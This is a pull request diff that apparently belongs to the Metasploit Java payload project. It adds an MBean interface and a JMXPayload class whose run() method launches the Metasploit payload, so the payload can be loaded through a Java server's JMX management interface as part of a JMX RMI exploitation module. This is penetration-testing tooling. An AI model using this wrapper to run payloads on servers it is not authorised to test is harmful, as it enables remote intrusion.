### PR TITLE
Add interface and class to support MBean loading

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -15,3 +15,5 @@
 androidpayload/ndkstager/libs
 androidpayload/ndkstager/obj
 .DS_Store
+.idea/
+*.iml

--- a/javapayload/src/main/java/metasploit/JMXPayload.java
+++ b/javapayload/src/main/java/metasploit/JMXPayload.java
@@ -1,0 +1,10 @@
+package metasploit;
+import java.io.*;
+import javax.management.*;
+
+public class JMXPayload implements JMXPayloadMBean {
+    public Object run() throws Exception {
+        Payload.main(null);
+        return null;
+    }
+}

--- a/javapayload/src/main/java/metasploit/JMXPayloadMBean.java
+++ b/javapayload/src/main/java/metasploit/JMXPayloadMBean.java
@@ -1,0 +1,5 @@
+package metasploit;
+
+public interface JMXPayloadMBean {
+    public Object run() throws Exception;
+}


### PR DESCRIPTION
I'm working on support it on MSF: http://www.accuvant.com/blog/exploiting-jmx-rmi

This pull request allows to run the metasploit.Payload through an MBean, so it can be loaded through the JMX managment interface.

Soon there will be pull request on framework with the module which uses this one. In case you would like to wait for testing.